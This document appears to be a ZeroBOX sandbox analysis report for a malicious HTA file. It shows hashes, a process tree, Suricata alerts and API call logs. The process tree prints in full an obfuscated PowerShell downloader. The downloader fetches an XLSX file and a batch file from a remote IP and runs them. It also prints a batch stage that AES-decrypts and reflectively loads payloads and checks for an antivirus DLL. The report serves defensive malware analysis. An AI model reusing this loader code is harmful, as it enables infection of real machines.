Summary | ZeroBOX

3.hta

Generic Malware Downloader Antivirus HTTP ScreenShot Create Service KeyLogger Internet API P2P DGA Http API FTP Socket Escalate priviledges DNS Code injection PWS Sniff Audio Steal credential GIF Format AntiDebug Lnk Format ZIP Format AntiVM PowerShell
Category Machine Started Completed
FILE s1_win7_x6401 May 9, 2024, 10:59 a.m. May 9, 2024, 11:03 a.m.
Size 12.9KB
Type HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5 4ab94c892e634430c8eabae82af4d875
SHA256 2f8dc972e9ec1b47d2beb064776d2df9778d253a5030870405843bed0fb32640
CRC32 7300133F
ssdeep 384:lop4KdAK/GEDKKb8AKKbFq2KKbZ6cjKL7ZwW7+6OJnkpwcRRZsKwtrlio0KwJ2r:lUJ/GeKKb5KKb3KKbZ6aKi6KnkphsKLs
Yara None matched

  • mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\3.hta

    2548
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function APgmbjLOXLyDCo($JbCqR, $haYSvpsUITIjCDP){[IO.File]::WriteAllBytes($JbCqR, $haYSvpsUITIjCDP)};function EAdhMqKTsBgn($JbCqR){if($JbCqR.EndsWith((uGIVecNMsbxk @(64700,64754,64762,64762))) -eq $True){rundll32.exe $JbCqR }elseif($JbCqR.EndsWith((uGIVecNMsbxk @(64700,64766,64769,64703))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $JbCqR}elseif($JbCqR.EndsWith((uGIVecNMsbxk @(64700,64763,64769,64759))) -eq $True){misexec /qn /i $JbCqR}else{Start-Process $JbCqR}};function wjPCvObwAmjJyUdaXG($gQOBxNAyeHpqX){$dDskdaHYdZknHXzXJymo = New-Object (uGIVecNMsbxk @(64732,64755,64770,64700,64741,64755,64752,64721,64762,64759,64755,64764,64770));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$haYSvpsUITIjCDP = $dDskdaHYdZknHXzXJymo.DownloadData($gQOBxNAyeHpqX);return $haYSvpsUITIjCDP};function uGIVecNMsbxk($lugVvlCCwkT){$GJPGF=64654;$FkAAPhCqeNqpA=$Null;foreach($bUICCliWWpr in $lugVvlCCwkT){$FkAAPhCqeNqpA+=[char]($bUICCliWWpr-$GJPGF)};return $FkAAPhCqeNqpA};function XEctGdesQtRZym(){$YDrprhvMBVQKEHdY = $env:AppData + '\';$aLjfwbQTGPkIcn = $YDrprhvMBVQKEHdY + '33.xlsx';If(Test-Path -Path $aLjfwbQTGPkIcn){Invoke-Item $aLjfwbQTGPkIcn;}Else{ $xnvLVBnevhBEnLRIzgp = wjPCvObwAmjJyUdaXG (uGIVecNMsbxk @(64758,64770,64770,64766,64712,64701,64701,64703,64711,64705,64700,64704,64704,64704,64700,64711,64708,64700,64703,64704,64706,64712,64709,64704,64710,64709,64701,64705,64705,64700,64774,64762,64769,64774));APgmbjLOXLyDCo $aLjfwbQTGPkIcn $xnvLVBnevhBEnLRIzgp;Invoke-Item $aLjfwbQTGPkIcn;};$bZgJKEnoQHIlgQ = $YDrprhvMBVQKEHdY + 'xD.bat'; if (Test-Path -Path $bZgJKEnoQHIlgQ){EAdhMqKTsBgn $bZgJKEnoQHIlgQ;}Else{ $shhld = wjPCvObwAmjJyUdaXG (uGIVecNMsbxk @(64758,64770,64770,64766,64712,64701,64701,64703,64711,64705,64700,64704,64704,64704,64700,64711,64708,64700,64703,64704,64706,64712,64709,64704,64710,64709,64701,64774,64722,64700,64752,64751,64770));APgmbjLOXLyDCo $bZgJKEnoQHIlgQ $shhld;EAdhMqKTsBgn $bZgJKEnoQHIlgQ;};;;;}XEctGdesQtRZym;

      2652
      • EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" /e

        2812
      • cmd.exe cmd /c ""C:\Users\test22\AppData\Roaming\xD.bat" "

        2976
        • cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\test22\AppData\Roaming\xD.bat"

          3052
          • cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\test22\AppData\Roaming\xD.bat';$wGtl='LowQGLawQGLdwQGL'.Replace('wQGL', ''),'ElfxQUemfxQUenfxQUtAfxQUtfxQU'.Replace('fxQU', ''),'FUtjArUtjAomUtjABasUtjAe6UtjA4UtjAStrUtjAingUtjA'.Replace('UtjA', ''),'GeOQGltOQGlCurOQGlrOQGleOQGlntOQGlPrOQGloOQGlcesOQGlsOQGl'.Replace('OQGl', ''),'EsWNTntsWNTryPsWNToisWNTntsWNT'.Replace('sWNT', ''),'MaieNXOnMoeNXOdueNXOleNXOeeNXO'.Replace('eNXO', ''),'TrOcAbansOcAbfoOcAbrmFOcAbiOcAbnaOcAblBOcAblocOcAbkOcAb'.Replace('OcAb', ''),'Splwhduiwhdutwhdu'.Replace('whdu', ''),'InPTvuvokPTvuePTvu'.Replace('PTvu', ''),'CreUFVYaUFVYteUFVYDUFVYecUFVYryUFVYptUFVYoUFVYrUFVY'.Replace('UFVY', ''),'CharscrngerscrErscrxrscrtrscrerscrnsirscrorscrnrscr'.Replace('rscr', ''),'DebAhhcobAhhmbAhhprbAhhebAhhssbAhh'.Replace('bAhh', ''),'CwGRRopwGRRyTwGRRowGRR'.Replace('wGRR', ''),'ReygHbadygHbLiygHbneygHbsygHb'.Replace('ygHb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($wGtl[3])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function kqXMT($FvMLi){$yuVsf=[System.Security.Cryptography.Aes]::Create();$yuVsf.Mode=[System.Security.Cryptography.CipherMode]::CBC;$yuVsf.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$yuVsf.Key=[System.Convert]::($wGtl[2])('ZPmarITq2qISishmMhAN5SieN3zSIyXHEEMkcAYPN4Y=');$yuVsf.IV=[System.Convert]::($wGtl[2])('pKL8KnX4ANOD8Ef8OdOJnQ==');$fXTHi=$yuVsf.($wGtl[9])();$KWagE=$fXTHi.($wGtl[6])($FvMLi,0,$FvMLi.Length);$fXTHi.Dispose();$yuVsf.Dispose();$KWagE;}function ymbNX($FvMLi){$BKlMi=New-Object System.IO.MemoryStream(,$FvMLi);$CmUjH=New-Object System.IO.MemoryStream;$xWgPw=New-Object System.IO.Compression.GZipStream($BKlMi,[IO.Compression.CompressionMode]::($wGtl[11]));$xWgPw.($wGtl[12])($CmUjH);$xWgPw.Dispose();$BKlMi.Dispose();$CmUjH.Dispose();$CmUjH.ToArray();}$pYGwG=[System.IO.File]::($wGtl[13])([Console]::Title);$BqtDQ=ymbNX (kqXMT ([Convert]::($wGtl[2])([System.Linq.Enumerable]::($wGtl[1])($pYGwG, 5).Substring(2))));$fdKjl=ymbNX (kqXMT ([Convert]::($wGtl[2])([System.Linq.Enumerable]::($wGtl[1])($pYGwG, 6).Substring(2))));[System.Reflection.Assembly]::($wGtl[0])([byte[]]$fdKjl).($wGtl[4]).($wGtl[8])($null,$null);[System.Reflection.Assembly]::($wGtl[0])([byte[]]$BqtDQ).($wGtl[4]).($wGtl[8])($null,$null); "

            2112
          • powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

            2064

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
193.222.96.124 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 193.222.96.124:7287 -> 192.168.56.101:49163 2400036 ET DROP Spamhaus DROP Listed Traffic Inbound group 37 Misc Attack
TCP 192.168.56.101:49163 -> 193.222.96.124:7287 2027254 ET INFO Dotted Quad Host XLSX Request Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net.
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: lowing enumeration values and try again. The possible enumeration values are "S
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: sl3, Tls"."
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: At line:1 char:691
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: + function APgmbjLOXLyDCo($JbCqR, $haYSvpsUITIjCDP){[IO.File]::WriteAllBytes($J
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: bCqR, $haYSvpsUITIjCDP)};function EAdhMqKTsBgn($JbCqR){if($JbCqR.EndsWith((uGIV
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: ecNMsbxk @(64700,64754,64762,64762))) -eq $True){rundll32.exe $JbCqR }elseif($J
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: bCqR.EndsWith((uGIVecNMsbxk @(64700,64766,64769,64703))) -eq $True){powershell.
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: exe -ExecutionPolicy unrestricted -File $JbCqR}elseif($JbCqR.EndsWith((uGIVecNM
console_handle: 0x0000008f
1 1 0

WriteConsoleW

buffer: sbxk @(64700,64763,64769,64759))) -eq $True){misexec /qn /i $JbCqR}else{Start-P
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: rocess $JbCqR}};function wjPCvObwAmjJyUdaXG($gQOBxNAyeHpqX){$dDskdaHYdZknHXzXJy
console_handle: 0x000000a7
1 1 0

WriteConsoleW

buffer: mo = New-Object (uGIVecNMsbxk @(64732,64755,64770,64700,64741,64755,64752,64721
console_handle: 0x000000b3
1 1 0

WriteConsoleW

buffer: ,64762,64759,64755,64764,64770));[Net.ServicePointManager]:: <<<< SecurityProto
console_handle: 0x000000bf
1 1 0

WriteConsoleW

buffer: col = [Net.SecurityProtocolType]::TLS12;$haYSvpsUITIjCDP = $dDskdaHYdZknHXzXJym
console_handle: 0x000000cb
1 1 0

WriteConsoleW

buffer: o.DownloadData($gQOBxNAyeHpqX);return $haYSvpsUITIjCDP};function uGIVecNMsbxk($
console_handle: 0x000000d7
1 1 0

WriteConsoleW

buffer: lugVvlCCwkT){$GJPGF=64654;$FkAAPhCqeNqpA=$Null;foreach($bUICCliWWpr in $lugVvlC
console_handle: 0x000000e3
1 1 0

WriteConsoleW

buffer: CwkT){$FkAAPhCqeNqpA+=[char]($bUICCliWWpr-$GJPGF)};return $FkAAPhCqeNqpA};funct
console_handle: 0x000000ef
1 1 0

WriteConsoleW

buffer: ion XEctGdesQtRZym(){$YDrprhvMBVQKEHdY = $env:AppData + '\';$aLjfwbQTGPkIcn = $
console_handle: 0x000000fb
1 1 0

WriteConsoleW

buffer: YDrprhvMBVQKEHdY + '33.xlsx';If(Test-Path -Path $aLjfwbQTGPkIcn){Invoke-Item $a
console_handle: 0x00000107
1 1 0

WriteConsoleW

buffer: LjfwbQTGPkIcn;}Else{ $xnvLVBnevhBEnLRIzgp = wjPCvObwAmjJyUdaXG (uGIVecNMsbxk @(
console_handle: 0x00000113
1 1 0

WriteConsoleW

buffer: 701,64705,64705,64700,64774,64762,64769,64774));APgmbjLOXLyDCo $aLjfwbQTGPkIcn
console_handle: 0x00000137
1 1 0

WriteConsoleW

buffer: $xnvLVBnevhBEnLRIzgp;Invoke-Item $aLjfwbQTGPkIcn;};$bZgJKEnoQHIlgQ = $YDrprhvMB
console_handle: 0x00000143
1 1 0

WriteConsoleW

buffer: VQKEHdY + 'xD.bat'; if (Test-Path -Path $bZgJKEnoQHIlgQ){EAdhMqKTsBgn $bZgJKEno
console_handle: 0x0000014f
1 1 0

WriteConsoleW

buffer: QHIlgQ;}Else{ $shhld = wjPCvObwAmjJyUdaXG (uGIVecNMsbxk @(64758,64770,64770,647
console_handle: 0x0000015b
1 1 0

WriteConsoleW

buffer: ,64752,64751,64770));APgmbjLOXLyDCo $bZgJKEnoQHIlgQ $shhld;EAdhMqKTsBgn $bZgJKE
console_handle: 0x0000017f
1 1 0

WriteConsoleW

buffer: noQHIlgQ;};;;;}XEctGdesQtRZym;
console_handle: 0x0000018b
1 1 0

WriteConsoleW

buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException
console_handle: 0x00000197
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : PropertyAssignmentException
console_handle: 0x000001a3
1 1 0

WriteConsoleW

buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net.
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: lowing enumeration values and try again. The possible enumeration values are "S
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: sl3, Tls"."
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: At line:1 char:691
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: + function APgmbjLOXLyDCo($JbCqR, $haYSvpsUITIjCDP){[IO.File]::WriteAllBytes($J
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: bCqR, $haYSvpsUITIjCDP)};function EAdhMqKTsBgn($JbCqR){if($JbCqR.EndsWith((uGIV
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: ecNMsbxk @(64700,64754,64762,64762))) -eq $True){rundll32.exe $JbCqR }elseif($J
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: bCqR.EndsWith((uGIVecNMsbxk @(64700,64766,64769,64703))) -eq $True){powershell.
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: exe -ExecutionPolicy unrestricted -File $JbCqR}elseif($JbCqR.EndsWith((uGIVecNM
console_handle: 0x0000008f
1 1 0

WriteConsoleW

buffer: sbxk @(64700,64763,64769,64759))) -eq $True){misexec /qn /i $JbCqR}else{Start-P
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: rocess $JbCqR}};function wjPCvObwAmjJyUdaXG($gQOBxNAyeHpqX){$dDskdaHYdZknHXzXJy
console_handle: 0x000000a7
1 1 0

WriteConsoleW

buffer: mo = New-Object (uGIVecNMsbxk @(64732,64755,64770,64700,64741,64755,64752,64721
console_handle: 0x000000b3
1 1 0

WriteConsoleW

buffer: ,64762,64759,64755,64764,64770));[Net.ServicePointManager]:: <<<< SecurityProto
console_handle: 0x000000bf
1 1 0

WriteConsoleW

buffer: col = [Net.SecurityProtocolType]::TLS12;$haYSvpsUITIjCDP = $dDskdaHYdZknHXzXJym
console_handle: 0x000000cb
1 1 0

WriteConsoleW

buffer: o.DownloadData($gQOBxNAyeHpqX);return $haYSvpsUITIjCDP};function uGIVecNMsbxk($
console_handle: 0x000000d7
1 1 0

WriteConsoleW

buffer: lugVvlCCwkT){$GJPGF=64654;$FkAAPhCqeNqpA=$Null;foreach($bUICCliWWpr in $lugVvlC
console_handle: 0x000000e3
1 1 0

WriteConsoleW

buffer: CwkT){$FkAAPhCqeNqpA+=[char]($bUICCliWWpr-$GJPGF)};return $FkAAPhCqeNqpA};funct
console_handle: 0x000000ef
1 1 0

WriteConsoleW

buffer: ion XEctGdesQtRZym(){$YDrprhvMBVQKEHdY = $env:AppData + '\';$aLjfwbQTGPkIcn = $
console_handle: 0x000000fb
1 1 0

WriteConsoleW

buffer: YDrprhvMBVQKEHdY + '33.xlsx';If(Test-Path -Path $aLjfwbQTGPkIcn){Invoke-Item $a
console_handle: 0x00000107
1 1 0

WriteConsoleW

buffer: LjfwbQTGPkIcn;}Else{ $xnvLVBnevhBEnLRIzgp = wjPCvObwAmjJyUdaXG (uGIVecNMsbxk @(
console_handle: 0x00000113
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00422010
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00422990
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00422990
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00422990
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00422b50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00422b50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00422b50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00422b50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00422b50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00422b50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00421f90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00421f90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00421f90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00422990
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00422990
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00422990
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00422850
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00422990
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00422990
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00422990
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00422990
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00422990
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00422990
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00422990
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00422cd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00422cd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00422cd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00422cd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00422cd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00422cd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00422cd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00422cd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00422cd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00422cd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00422cd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00422cd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00422cd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00422cd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00422c10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00422c10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00422c10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00422c10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00422c10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00422c10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00422c10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00422c10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00422c90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00422c90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0050c650
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0050d410
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office\12.0\Registration\{90120000-0030-0000-0000-0000000FF1CE}\DigitalProductID
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2548
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73bc2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 524288
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02670000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2652
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x717e1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0262a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2652
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x717e2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02622000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02672000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0269a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02673000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02674000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ab000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0262b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02692000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02675000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
